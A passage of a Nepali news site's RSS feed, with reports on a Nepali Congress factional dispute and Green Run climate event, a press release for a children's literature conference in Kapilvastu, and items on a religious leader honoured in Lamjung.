खड्काले भन्नुभयो, कांग्रेसको विवाद कहाँ र केमा छ ?’ उनले प्रश्न गर्दै भने, ‘जब १४औं महाधिवेशनबाट निर्वाचित टिम हटाएर विशेष महाधिवेशनबाट आएका सभापतिको सही चल्ने अवस्था भयो, विवाद त्यहीँबाट सुरू भयो ।’
विशेष महाधिवेशनमार्फत ५४ प्रतिशतको बलमा निर्वाचित नेतृत्वले १४औं महाधिवेशनबाट आएको संरचनालाई विस्थापित गरेको उहाँको तर्क थियो । उहाँले भन्नुभयो, ‘अदालत र निर्वाचन आयोगले त्यसलाई वैधानिकता दिएको भए पनि त्यसले राजनीतिक रूपमा समस्या समाधान गर्न सकेको छैन ।’ अहिलेको आवश्यकता ५४ र ४६ प्रतिशतको अंकगणितभन्दा माथि उठेर दुवै पक्षलाई एउटै संरचनामा जोड्ने राजनीतिक निर्णय भएको उहाँको कथन छ । उहाँले १४औं महाधिवेशनबाट निर्वाचित केन्द्रीय समितिलाई समेटेर नेतृत्वलाई पूर्णता दिनुपर्ने प्रस्तावलाई केही नेताले ‘बार्गेनिङ’का रूपमा व्याख्या गरेको भन्दै असहति व्यक्त गर्नुभयो । खड्काले चेतावनी शैलीमा भन्नुभयो, ‘आफूहरू अब निष्क्रिय नबस्ने र युवाहरूलाई अगाडि सारेर उनीहरूको रक्षाकवच बन्न तयार छौं ।’
नेता शेखर कोइरालाले कांग्रेसभित्रको संकटलाई पार्टीको लोकतान्त्रिक चरित्रमाथिको चुनौतीका रूप हो भन्नुभयो । उहाँले पछिल्ला समयमा कांग्रेसभित्र निर्णय प्रक्रिया संकुचित हुँदै गएको, फरक मत राख्नेहरूमाथि कारबाही बढेको र लोकतान्त्रिक पार्टीभित्रै स्वेच्छाचारी अभ्यास हाबी हुन थालेको दाबी गर्नुभयो । उहाँले भन्नुभयो, ‘निरंकुशता अन्त्यका लागि स्थापना भएको कांग्रेसभित्रै स्वेच्छाचारिता सह्य हुन सक्दैन ।’
सभापति गगन थापालाई प्रत्यक्ष सम्बोधन गर्दै शेखरले भन्नुभयो, ‘यदि कुनै दुर्भाग्यपूर्ण अवस्था आयो भने त्यसको सम्पूर्ण जिम्मेवारी तपाईंको हुनेछ, व्यक्तिवादी चरित्र छोड्नुस् । स्वार्थीपन छोड्नुस् र पार्टी एकताका लागि छिटो पहल गर्नुस् ।’
अर्का नेता विमलेन्द्र निधिले कांग्रेसभित्र पछिल्लो समय तीव्र रूपमा उठिरहेको ‘सामाजिक लोकतन्त्र’ सम्बन्धी बहसमाथि प्रश्न उठाउँदै बिपी कोइरालाको राजनीतिक दर्शनबाट कांग्रेस विचलित हुन नहुने बताउनु भयो ।
उहाँले बिपीले प्रतिपादन गरेको ’प्रजातान्त्रिक समाजवाद’ नेपाली कांग्रेसको मात्र नभई नेपाली लोकतान्त्रिक आन्दोलनकै दीर्घकालीन वैचारिक आधार भएको स्मरण गर्दै भन्नुभयो, ‘रास्वपाको चितवन महाधिवेशन अघिसम्म उसलाई विचारविहीन भनिन्थ्यो । त्यो महाधिवेशनबाट उसले ‘सामाजिक लोकतन्त्र’को नीति पारित गरेपछि कांग्रेसभित्र प्रतिस्पर्धा सुरू भएको छ ।’
उहाँले थप भन्नुभयो, ‘सामाजिक लोकतन्त्रको बहसलाई गगन थापाले अघि सारेको भन्ने शुक्राचार्यहरू देखिन थाले, यदि कांग्रेसले प्रजातान्त्रिक समाजवाद छाडेर सामाजिक लोकतन्त्रको एजेन्डा अँगाल्छ भने त्यो प्रगति होइन, वैचारिक पश्चगमन हो ।’
अहिलेसम्म भएका घटनाक्रम, नेतृत्वबीचको दूरी र निरन्तर असफल संवादका कारण पार्टी एकताको सम्भावना क्रमशः कमजोर बन्दै गएको उहाँको तर्क थियो । ‘तपाईंहरू राष्ट्रिय भेलामा आइदिनुस्। त्यस बेलासम्म एकता भएन भने नयाँ कार्यदिशातिर जानुपर्ने हुन सक्छ । त्यसमा तपाईंहरूको साथ छ ?’ भन्ने उहाँको प्रश्नमा उपस्थित नेता– कार्यकर्ताले ‘छ’ भन्दै जोडदार ताली बजाएका थिए ।
पूर्वमहामन्त्री डा. शशांक कोइरालाले पार्टीभित्रको असमझदारी, अविश्वास र समूहगत प्रतिस्पर्धा समयमै समाधान गर्न नसके कांग्रेस विभाजनको अवस्थामा पुग्न सक्ने चेतावनी दिनुभयो ।
पूर्वउपभासपति विजयकुमार गच्छदारले सभापति थापासँग कांग्रेसको आत्मा नभएको टिप्पणी गर्दै भन्नुभयो, ‘कांग्रेस यहाँ छ, कांग्रेसको भावना यहाँ छ, कांग्रेसको आत्मा यहाँ छ, कांग्रेसमा त्याग, बलिदान गरेका नेताहरू तपाईंभन्दा बाहिर छन् गगनकुमार थापा जी ।’
सभापति थापाको राजनीतिक संस्कारमा प्रश्न उठाउँदै गच्छदारले भन्नुभयो, ‘उहाँ मेरो पुत्रसमान हुनुहुन्छ, छोरा उमेरको मान्छेलाई पुत्रसमान भन्न नपाउने ? कस्तो संस्कार आएको ? कस्तो राजनीति आएको नेपालमा ?’
नेता कृष्णप्रसाद सिटौलाले पनि प्रष्ट रूपमा साउन अन्तिममा हुने राष्ट्रिय भेलाले नयाँ कार्यदिशा तय गर्ने बताउनु भयो ।
नेता एनपी साउदले कांग्रेसभित्रको संकट समाधानका लागि सबै पक्ष एक हुनुपर्नेमा जोड दिदै भन्नु्भयो, ‘निर्वाचन आयोग र अदालतले निर्णय गरे पनि राजनीतिक रूपमा कांग्रेसलाई एक नबनाएसम्म संकटको सामना गर्न सक्दैन । त्यसका लागि एकताबद्ध कांग्रेस जरुरी छ ।’ नेता साउदले जोड दिदै भन्नुभयो, ‘यहाँ आउनेहरू दास र लास होइनन्, भरोसा र विश्वास हुन्, त्यसैले विशेषमा जाने हुन् वा नजाने, सबैले मिल्नुपर्छ, मिलेर मात्रै लडाइँ जित्न सकिन्छ ।’
नेता डा. प्रकाशशरण महतले सभापति गगन थापा एक्लै पार्टी चलाउन सक्छु भन्ने भ्रममा रहेको दावी गर्दै अहिले पार्टी एकता अपरिहार्य छ तर त्यो कसरी भन्ने महत्वपूर्ण छ भन्नुभयो ।
‘बृहत एकता त्यसै हुन्छ ?, त्यसका लागि सम्मानजनक एकता चाहिँदैन ? भन्ने प्रश्न गर्दै यदि त्यस्तो अवस्था आएन भने जस्तोसुकै निर्णयतिर अघि बढ्नुपर्ने अवस्था आउनसक्छ ।’
नेता मोहन बस्नेतले भने नयाँ पार्टी गठनको तयारी गर्नुपर्ने धारणा राख्नुभयो । ‘प्रदेश भेला गरिसक्यौं, अब केन्द्रीय भेला राख्नुपर्छ, पार्टी फुटाउने होइन, अर्को पार्टी बनाउने हो। गगन थापाको नेतृत्वमा लोकतान्त्रिक शक्तिलाई सती जान दिइनेछैन ।’ उहाँको तर्क थियो ।
कोशीका पूर्वमुख्यमन्त्री केदार कार्कीले पनि सहमतिको सम्भावना नरहेको संकेत गर्दै नेतृत्वलाई वैकल्पिक राजनीतिक बाटोका लागि तयार रहन आग्रह गर्नु भएको थियो । उहाँले भन्नुभयो, ‘हामी अहिले सम्झिन्छौं, गिरिजाप्रसाद कोइरालाले त्यसबेला भनेको कुरा । गगन थापा कहिँबाट सञ्चालित छन् भन्ने प्रमाणित हुँदै छ । नाङ्गो आँखाले देखिँदै छ ।’ संस्थापन पक्षको ‘ग्रीन रन’ कार्यक्रम :
उता, नेपाली कांग्रेसले जलवायु परिवर्तनप्रति जनचेतना जगाउने उद्देश्यले काठमाडौं उपत्यकामा ‘ग्रिन रन’ आयोजना गर्यो । आज बिहान आयोजित कार्यक्रममा कांग्रेस सभापति गगनकुमार थापा लगायतका नेता–कार्यकर्ताहरूले भाग लिएका थिए । पार्टी सभापति गगन थापाले राजधानीमा आयोजित ‘ग्रीन रन’ नामक दौडपछि अर्थपूर्ण मन्तव्यमा भन्नुभयो– ‘गाडीमा ब्रेक नहुनेले सरकार चलाउँदैछ, दौडमा ब्रेक नहुनेले प्रतिपक्ष ।’ यद्यपि पार्टीभित्रको सत्तामा बसेका थापाले देउवा पक्षसँग सम्झौता गर्ने कुनै सम्भावना नरहेको समेत प्रष्ट गर्दै आफू ब्रेकबेगर नै अघि बढ्ने बाटो समाएको छनक दिनुभयो ।
कांग्रेस उपसभापति एवं प्रतिष्ठानका प्रमुख विश्वप्रकाश शर्माले ‘जलवायु जनचेतना जगाउन जुटौं’ नाराका साथ पाँच किलोमिटर दौड आयोजना गरिएको बताउनु भयो । दौडलगत्तै जावलाखेल चोक, फाल्चामा ‘जलवायु परिवर्तनको चुनौती ः निराकरण कसरी’ शीर्षकमा विज्ञहरूसहितको समूहगत छलफल गरिएको शर्माले बताउनु भयो । समूहगत छलफल चलिरहँदा, सोही स्थलमा जलवायु परिवर्तनका चुनौती र सम्भावना झल्काउने चित्रहरू सुपरिचित चित्रकारहरुद्वारा पेन्टिङ गर्ने कार्य समेत भएको थियो ।
यसैगरी, आज साउन ७ गते पार्टीले सोहीदिन राष्ट्रिय सभागृहमा ‘नवीन परिस्थिति : नवीन संकल्प, नवीन अभियान’ विषयक विचार गोष्ठी आयोजना गर्ने कांग्रेसले जनाएको छ । पार्टीको नवीन अभियान घोषणा सहितको कार्यक्रम हुनेछ । कांग्रेसले ‘ग्रीन रन’मा सहभागी हुनेको संख्याका आधारमा प्रतिव्यक्ति निश्चित रकम आफ्नो कोषबाट रकम जम्मा गरेर एक ‘मानवीय सहयोग कोष’को घोषणा गरेको छ ।
सो कोषको रकम पछिल्लो समय विस्थापित गरिएका सुकुम्वासी परिवारका वृद्ध र बालबालिकाको हितमा खर्च गरिने बताइएको छ ।
त्यस्तै, इतरपक्षले राजनीतिक, वैधानिक र नैतिक तीनै शक्ति आफूसँग रहेको भन्दै संस्थापन पक्षका नेताहरूले साउन २९ गतेको भेलाको अर्थ नहुने दाबी गरेका छन् ।
‘सम्मानजनक एकता नभए जस्तोसुकै निर्णय गर्नुपर्ने हुन सक्छ’– नेपाली कांग्रेसको इतर समूहले विपी कोइरालाको ४४औँ स्मृति दिवसका अवसरमा आयोजना गरेको कार्यक्रममा दिएको सन्देश यही हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=502390३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु
https://www.antaranganews.com/?p=50229
https://www.antaranganews.com/?p=50229#respondWed, 22 Jul 2026 01:36:35 +0000https://www.antaranganews.com/?p=50229तिलौराकोट (कपिलवस्तु)– नेपाल बालसाहित्य समाजको ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुको यहाँ दुई दिने कार्यक्रमका साथ हुने भएको छ । सम्मेलनको तयारी सुरु भएको आयोजक समितिले प्रेस वक्तव्य जारी गर्दै साउन ३ गते जानकारी दिएको हो ।
सो राष्ट्रिय सम्मेलन आगामी मंसिर ११ र १२ गते तिलौराकोटको पावन काखमा भव्य रूपमा सम्पन्न हुन गइरहेको व्यहोरा यहाँहरू सबैलाई जानकारी गराउँदछौँ । तिलौराकोटको ऐतिहासिक माटोको सुगन्ध, बुद्धकालीन शान्तिको दर्शन र आधुनिक बाल सिर्जनशीलताको अनुपम त्रिवेणी बन्ने उक्त गरिमामय कार्यक्रममा राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरका विज्ञहरू, स्रष्टाहरू र बालबालिकाहरूको उपस्थिति रहनेछ । प्राचीन कालमा सिद्धार्थ गौतमले बाल्यकाल बिताएको यसै भूमिबाट वर्तमानका बालबालिकाको सिर्जनात्मक र बौद्धिक क्षमतालाई उजागर गर्दै मौलिक एवं रैथाने बालसाहित्यको संरक्षण गर्ने ऐतिहासिक अवसरका रूपमा यस सम्मेलनलाई लिइएको छ । यस ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ लाई भव्य र ऐतिहासिक रूपमा सफल पार्नका लागि आवश्यक स्रोत सङ्कलन, व्यवस्थापन तथा पूर्वतयारीका कार्यहरू द्रुत गतिमा अघि बढिरहेको बताइएको छ ।
स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो । स्थानीय मूल आयोजक समिति, कपिलवस्तुको आयोजनामा हुन लागेको यस सम्मेलनले बाल साहित्यको विकाससँगै कपिलवस्तुको ऐतिहासिक, पुरातात्त्विक, सांस्कृतिक तथा पर्यटकीय महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरमा उजागर गर्ने महत्वपूर्ण अवसर प्रदान गर्नेछ ।
जारी प्रेस वक्तव्यमा नेपाल बालसाहित्य समाजको ऐतिहासिक पृष्ठभूमि सहित वि.सं. २०४४ सालमा स्थापित भएको बताइएको छ । सो सम्मेलनमा आयोजक संस्थाले बालसाहित्यिक आफ्नो स्थापना कालदेखि नै बालबालिका तथा किशोर किशोरीहरूको लेखनकला र सिर्जनशीलताका साथसाथै पठन संस्कार र संस्कृतिको विकासका लागि विभिन्न सङ्घसंस्थाहरूसँग सहकार्य गर्दै नेपालका विभिन्न स्थानहरूमा राष्ट्रिय बालसाहित्य सम्मेलन आयोजना गर्दै आएको जनाएको छ ।
सा वक्तव्यमा शान्तिका अग्रदूत शाक्यमुनि बुद्धले आफ्नो जीवनका अमूल्य २९ वर्ष बिताउनुभएको, बाल्यकालीन क्रीडा गर्नुभएको, प्रारम्भिक शिक्षा आर्जन गर्नुभएको र मानव कल्याणका लागि महाभिनिष्क्रमण (ज्ञानको खोजीमा गृहत्याग) गर्नुभएको ऐतिहासिक, पुरातात्विक तथा पावन भूमि कपिलवस्तुको तिलौराकोट दरबार क्षेत्रमा नेपाल बालसाहित्य समाजले ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ आयोजना गर्ने गौरवमय निर्णय गरेको उल्लेख छ । प्राचीन शाक्य गणराज्यको राजधानी तथा बुद्धकालीन ज्ञान र सभ्यताको केन्द्रका रूपमा रहेको यस ऐतिहासिक पर्यटकीय एवम् आध्यात्मिक स्थलमा देशभरका र एशीया क्षेत्रका बालसाहित्य अनुरागी, स्रष्टाहरू तथा बालबालिकाहरूलाई स्वागत गर्न पाउनु हाम्रा लागि अहोभाग्यको हो वक्तव्यमा भनिएको छ । सम्मेलनको उद्देश्य :
भगवान् गौतमबुद्धको बाल्यकाल तथा किशोरावस्थासँग जोडिएको ऐतिहासिक प्राचीन कपिलवस्तु (तिलौराकोट) को पवित्र भूमिमा आयोजना हुन लागेको यस सम्मेलनले साहित्य, इतिहास र पर्यटनलाई एउटै साझा मञ्चमा जोड्नेछ। गौतमबुद्धको क्रीडास्थलका रूपमा परिचित तिलौराकोट, बुद्धसँग सम्बन्धित महत्वपूर्ण स्थल कुदान, नेपाली साहित्यका विशिष्ट साधक साहित्यकार भवानी भिक्षुको जन्मभूमि तथा कपिलवस्तुका अन्य ऐतिहासिक, पुरातात्त्विक र सांस्कृतिक सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै यस क्षेत्रको महत्वलाई विश्वसामु प्रस्तुत गर्ने सम्मेलनको उद्देश्य रहेको उल्लेख छ ।
बाल साहित्यको माध्यमबाट बालबालिकामा सिर्जनशीलता, कल्पनाशक्ति, नैतिक चेतना, मानवीय मूल्य, सामाजिक उत्तरदायित्व तथा विश्वबन्धुत्वको भावना विकास गर्ने उद्देश्यका साथ आयोजना हुन लागेको यस सम्मेलनमा नेपालका विभिन्न क्षेत्र तथा एसियाली मुलुकहरूबाट बाल साहित्यकार, लेखक, शिक्षाविद्, अनुसन्धानकर्ता, शिक्षक, विद्यार्थी तथा साहित्यप्रेमीहरूको सहभागिता रहने अपेक्षा गरिएको छ । सम्मेलनको मूल उद्देश्य सात :
सम्मेलनको मूल उद्देश्यलाई सात बुँदामा उल्लेख गरिएको छ । स्थानीय बालबालिका, किशोरकिशोरी, शिक्षक, अभिभावक, साहित्यकार, कलाकारलगायत देश तथा विदेशबाट पाल्नुहुने दिग्गज सर्जकहरूको उपस्थितिमा सम्पन्न हुने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’का मुख्य उद्देश्यहरू निम्नअनुसार रहेका छन् वक्तव्यमा भनिएको छ । ती हुन् ः
१) बालबालिका तथा किशोर किशोरीको लेखनकला, सिर्जनशीलता र सिप विकासमा टेवा पुरÞ्याउने ।
२) बालसाहित्यबारे शिक्षक, अभिभावक तथा विद्यार्थीहरूमा अभिरुचि र चेतना अभिवृद्धि गर्ने ।
३) बालबालिका तथा किशोरकिशोरीहरूमा साहित्यिक विभिन्न विधाहरूमध्ये कथा र कविता लेखन तथा वाचन, चित्रकला, अभिनय आदिको सिप विकास तथा क्षमता अभिवृद्धि गर्ने ।
४) पठन सीप र संस्कारको विकास गर्ने ।
५) पुस्तकालय व्यवस्थापन, पुस्तक प्रकाशनबारे बालबालिकालाई हौसला र उत्प्रेरणा दिने ।
६) नेपाली बालपुस्तकहरूबारे जानकारी दिने ।
७) स्थानीय सांस्कृतिक धरोहर, पुरातात्विक महत्त्व र मौलिक एवम् रैथाने बालसाहित्यको संरक्षण गर्ने ।
कपिलवस्तु र कपिलवस्तुवासीको प्रतिष्ठा र गौरवको विषय बनेको यो ऐतिहासिक सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउने उद्देश्यले मिति २०८२ चैत्र २१ गते भृकुटी सामुदायिक सिकाइ केन्द्रको बैठकले एक स्थानीय मूल आयोजक समिति गठन गरी आफ्ना कार्य सम्पादन गरिरहेको छ । सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउन पत्रकार सम्मेलन मार्फत जानकारी गराइन्छ । बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौतीको खोजी :
बाल साहित्य बालबालिकाको मनोरञ्जनको माध्यम मात्र नभई उनीहरूको व्यक्तित्व विकास, संस्कार निर्माण, कल्पनाशीलता, सिर्जनात्मकता, वैज्ञानिक सोच र सामाजिक चेतना विकास गर्ने महत्वपूर्ण आधार हो । यसै मान्यतालाई आत्मसात् गर्दै सम्मेलनमा बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौती, शिक्षासँगको सम्बन्ध, प्रविधिको प्रभाव तथा अन्तर्राष्ट्रिय सहकार्यका विविध विषयमा विमर्श, संवाद, सिर्जनात्मक प्रस्तुति तथा साहित्यिक गतिविधिहरू सञ्चालन हुने जानकारी वक्तव्यमाफर्त दिइएको छ । सम्मेलनमा हुने मुख्यमुख्य कार्यक्रमहरू :
मङ्सिर ११ र १२ गते हुने दुई दिने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ अन्तर्गत सम्पन्न गरिने मुख्यमुख्य कार्यक्रमहरू समेत वक्तव्यमै जानकारी दिइएको छ ।
उक्त सम्मेलनमा हुने कार्यशालामा १) बालकथा लेखन कार्यशाला, २) कविता लेखन कार्यशाला, ३) निबन्ध लेखन कार्यशाला, ४) समीक्षा लेखन कार्यशाला, ५) चित्रकला लेखन कार्यशाला, ६) हस्तलेखन कार्यशाला, ७) अभिनय प्रशिक्षण कार्यशाला, ८) नृत्य प्रशिक्षण कार्यशाला र ९) देवनागरी लिपिमा हस्तलेखन हुने भनिएको छ ।
साथमा विषयक्षेत्रमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने समेत वक्तव्यमार्फत जानकारी दिइएको छ । ती हुन् ः क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति छ) हस्तलिपि प्रदर्शनी आदि छन् ।
यसैगरी, उक्त अवसरमा बीचबीचमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने जानकारी दिदै तिनमा क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति, छ) हस्तलिपि प्रदर्शनी रहेको उल्लेख छ । कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने आंकलन :
उक्त सम्मेलन सम्पन्न गर्नका लागि कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने अनुमान गरिएको छ, जसमध्ये ७ लाख समाजको केन्द्र र ५ लाख स्थानीय आयोजकले व्यवस्थापन गर्नुपर्ने बताइएको छ । एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू र पाँच सय जना विद्यार्थीहरूले भाग लिने :
उक्त सम्मेलनमा एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू तथा कपिलवस्तु जिल्लाका करिब पाँच सय जना विद्यार्थीहरूले भाग लिने साहित्यिक इतिहासको कालखण्डमा विरलै हुने जिल्लाको यो ऐतिहासिक सम्मेलन केवल बालसाहित्य वा सिर्जना क्षेत्रका लागि मात्र नभई सिङ्गो कपिलवस्तु र कपिलवस्तुवासीको गौरवको कार्यक्रम भएकाले यसमा हामी सबैको इज्जत र प्रतिष्ठा जोडिएको समाजद्वारा जारी वक्तव्यमा उल्लेख छ ।
सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहने बताइएको छ ।
यस सम्मेलनले कपिलवस्तुको ऐतिहासिक तथा पुरातात्त्विक महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरमा थप परिचित गराउनुका साथै साहित्यिक, सांस्कृतिक तथा ऐतिहासिक पर्यटनको विकास र प्रवर्धनमा समेत महत्वपूर्ण योगदान पु¥याउनुका साथै यस पवित्र तिलौराकोटलाई विश्व सम्पदा सूचीमा सूचीकृतको लागि टेवा पुग्ने अपेक्षा गरिएको जारी वक्तव्यमा भनिएको छ ।
गौतमबुद्धको बाल्यकालसँग सम्बन्धित प्राचीन कपिलवस्तुको ऐतिहासिक विरासत,विश्व रामसार सूचीमा सूचीकृत जगदिशपुर सिमसार क्षेत्रको अद्वितीय प्राकृतिक सौन्दर्य, साहित्यकार भवानी भिक्षुको साहित्यिक योगदान तथा कुदानलगायतका महत्वपूर्ण सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै आयोजना हुन लागेको यो सम्मेलनले कपिलवस्तुको इतिहास, साहित्य, संस्कृति र पर्यटनलाई विश्वमञ्चमा प्रस्तुत गर्ने महत्वपूर्ण आधार निर्माण गर्ने विश्वास गरिएको छ । यस सम्मेलनको सफल आयोजनाका लागि स्थानीय मूल आयोजक समिति, कपिलवस्तुले नेपाल सरकार, प्रदेश सरकार, स्थानीय तह, पुरातत्व तथा पर्यटन क्षेत्रसँग सम्बन्धित निकाय, साहित्यिक तथा शैक्षिक संस्था, सञ्चारमाध्यम, साहित्यकार, शिक्षक, अभिभावक, विद्यार्थी तथा सम्पूर्ण साहित्यप्रेमी महानुभावहरूमा सक्रिय सहयोग, सहभागिता र सहकार्यका लागि हार्दिक आह्वान गर्दछ वक्तव्यमा उल्लेख छ । रमेशचन्द्र घिमिरेको सहयोगमा ।
]]>https://www.antaranganews.com/?feed=rss2&p=502290प्रथम जगद्गुरु वालसन्त मोहनशरणलाई अभिनन्दन : फोटो फिचर
https://www.antaranganews.com/?p=50189
https://www.antaranganews.com/?p=50189#respondMon, 20 Jul 2026 14:41:06 +0000https://www.antaranganews.com/?p=50189पाउँदी(लमजुङ)– लमजुङमा नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीलाई अभिनन्दन गरिएको छ । सर्वोदय सेवाश्रम तथा धर्मनाथ धाममा साउनको पहिलो सोमबार आयोजित बोलबम मेला तथा निर्मित नक्षत्रवाटिकाको उदघाटनका लागि सहभागी हुनु हुँदा जगतगुरु मोहनशरणलाई साउन ४ गते सम्मान गरिएको हो ।
जगद्गुरु मोहनशरणलाई गण्डकी प्रदेशका सामाजिक विकास, युवा तथा खेलकुद मन्त्री रेखा गुरुङ, प्रदेश सभा सदस्य पार्वती तामाङ, राइनास नगरपालिकाका प्रमुख खड्ग गुरुङलगायतले सम्मान गर्नु भएको हो । कार्यक्रममा जगतगुरुका साथमा आश्रमलाई सहयोग गर्ने सामाजिक विकास मन्त्रालय गण्डकी प्रदेश, नक्षत्र बाटिकामा सहयोग गर्नु हुने जिल्ला वन डिभिजन कार्यालय लमजुङलाई सम्मान गरिएको थियो ।
प्रमुख अतिथि जगद्गुरु मोहनशरणले नक्षत्र बाटिकामा स्वस्ती वाचनका साथ समुदघाटन गर्नुका साथै विभिन्न जातका बिरुवा रोपण कार्यको पनि सुभारम्भ गर्नुभयो । नक्षत्र बाटिकामा २७ नक्षत्र झल्काउने अर्थात प्रतीकका रुपमा २७ प्रकारका विरुवा रोपण गरिएको छ । रोपिएका विरुवाहरूको प्रवन्ध जिल्ला वन डिभिजन कार्यालय लमजुङका प्रमुख दिपकप्रसाद पण्डितले गरेको सो आश्रमका प्रचार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
सो अवसरमा आजै जन्मदिन पर्नु हुने वातावरण प्रेमी शोभा धिताललाई प्रमुख अतिथि जगतगुरुले मन्त्र उच्चारण गरी आशीर्वाद ग्रहण गरी बिरुवा रोपेर जन्म दिन मनाइएको थियो । सो अवसरमा संस्थाका अध्यक्ष कृष्णराज ओलिया, उपाध्यक्ष सुकदेव रिसाल, जन्म दिन बृक्षारोपणका अध्यक्ष बासुदेव सेडाइ तथा आश्रमका सञ्चार संयोजक लक्ष्मी प्रसाद मिश्रले सहजीकरण गर्नु भएको थियो ।
सो अवसरमा आफ्नो संक्षिप्त मन्तव्यमा जगद्गुरु मोहनशरणले नेपालको महत्वमा विभिन्न पुराणहरूका पंक्ति उद्धरा गर्दै उदाहरण सहित व्यख्या गरेका थिए । उनले भारत भन्दा पनि पहिलो नेपाललोकको जन्म भएको भरत इष्टइण्डियाले नामाकरण गरेको हो तर नेपालको भने पाँच हजार वर्ष पहिले नै देखिएको पुराणहरूमा यस देशको व्याख्या रहेको उल्लेख गर्नुभयो । आज विभिन्न जाति र दलमा मानिस विभाजित छन् तर नेपाली कोही भेटिदैन भन्दै दुःखव्यक्त गर्नुभयो ।
मर्स्याङदी नदी भनेको मोक्ष दिने नदी हो यसमा नुहाउँदा मोक्ष प्राप्ति हुन्छ, लमजुङ र मर्स्याङदीका बारेमा बताउने गरी अर्कोपटक अलिक लामो समय लिएर आउने प्रतिवद्धता उहाँले व्यक्त गर्नुभयो ।
सो मेलाका अवसरमा रसिदबाट र दानपेटिकमा चढाएको भेटी कुल रकम ८७ हजार ४२२ रुपैया नगद आम्दानी भएको प्रचार प्रसार संयोजक लक्ष्मीप्रसाद मिश्रले बताउनु भयो ।
आयोजक संस्थाका अध्यक्ष कृष्णराज ओलियाले कार्यक्रम सञ्चालन गर्नु भएको थियो भने उपाध्यक्ष सुकदेव रिसालले स्वागत मन्तब्य व्यक्त गर्नु भएको थियो । कार्यक्रमका सभाध्यक्ष हरिप्रसाद धितालले धन्यवाद सहित सभा विसर्जनको घोषणा गर्नु भएको थियो । प्रस्तुत छ उक्त कार्यक्रमको फोटो फिचर :
]]>https://www.antaranganews.com/?feed=rss2&p=501890नेपालका प्रथम जगत गुरु देवाचार्य मोहनशरण लमजुङमा
https://www.antaranganews.com/?p=50162
https://www.antaranganews.com/?p=50162#respondSun, 19 Jul 2026 12:41:17 +0000https://www.antaranganews.com/?p=50162पाउँदी(लमजुङ)– नेपाल राष्ट्का प्रथम जगद्गुरु चतराधामका पीठाधीश वालसन्त मोहनशरण देवाचार्य महाराजश्री लमजुङ आउनु भएको छ । लमजुङको राइनास नगरपालिका– ८ हर्राबोटमा रहेको सर्वोदय सेवाश्रम स्थित धर्मनाथ धाममा निर्मित नक्षत्र वाटिकाको साथमा भोलिबाट सुरु हुने श्रावणी बोलबम मेलाको साउन ४ गते समुदघाटनका लागि उहाँ आउनु भएको हो ।
स्वामी महाराजको मुक्तिनाथ गएर फर्कने क्रममा यो जिल्लामा पहिलो पटक यस धाममा आउनु भएको हो । मेलाको उदघाटन सहितका विभिन्न कार्यक्रममा सरिक हुनु भई दिनभर बसेर उहाँ भोलि साँझ चतराधाम फर्कनु हुने कार्यक्रम तय भएको ओलियाले बताउनु भयो । उहाँका अनुसार नेपाल राष्ट्रका प्रथम जगद्गुरु वालसन्त मोहनशरण देवाचार्य महाराजश्रीको करकमलबाट साउनको पहिलो सोमबार शुभारम्भ गरिने छ । साथमा उहाँले नक्षत्र वाटिकाको समेत उदघाटन गर्नु हुने भएको छ । आश्रम हातामा २७ नक्षत्र, १२ राशी र नौ ग्रहको वाटिका निर्माण गरिएको छ । यो वाटिका गण्डकी प्रदेशमै पहिलो भएको ओलियाले जानकारी दिनुभयो ।
साउन ४ गते पहिलो सोमबार पूर्वाङ्ग, उद्घाटनसहित मञ्चका कार्यक्रमका साथ भजन कीर्तन, प्रवचन, प्रसाद वितरण र साँझ आरतीको कार्यक्रम तय गरिएको छ ।
